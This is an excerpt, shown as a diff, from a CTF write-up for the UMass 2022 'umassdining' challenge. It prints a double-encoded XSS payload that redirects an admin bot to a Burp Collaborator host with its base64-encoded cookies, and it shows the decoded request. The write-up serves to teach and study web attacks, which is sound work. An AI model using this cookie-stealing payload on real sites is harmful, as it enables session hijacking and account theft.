nikosChalk/ctf-writeups/umass22/umassdining/README.md

 email=asd%40foo.com&essay=<p%2bid%253d"debug"%2b%2bdata-iloveumass%253d"')%253b%2bwindow.location%2b%253d%2b'http%253a//nb20aa7dkwzrirpv5qa71lnleck28r.burpcollaborator.net/cookie%253d'%252bencodeURIComponent(btoa(document.cookie))%253b%2b//"></p>%2b<script%2bsrc%253d/static/js/thing.js></script>
 ```

 Notice the double encoding of all the characters.
 The first encoding is for the current request that we are making.
-Then, when the bot will make the request, it will decode the characters once.
-So the bot will do:
+Then, when the bot will make the request, it will decode the characters once more.
+So, after the first decoding, the bot will do the following request:

 ```
 GET /review/essay?email=asd@foo.com&essay=<p+id%3d"debug"++data-iloveumass%3d"')%3b+window.location+%3d+'http%3a//nb20aa7dkwzrirpv5qa71lnleck28r.burpcollaborator.net/cookie%3d'%2bencodeURIComponent(btoa(document.cookie))%3b+//"></p>+<script+src%3d/static/js/thing.js></script>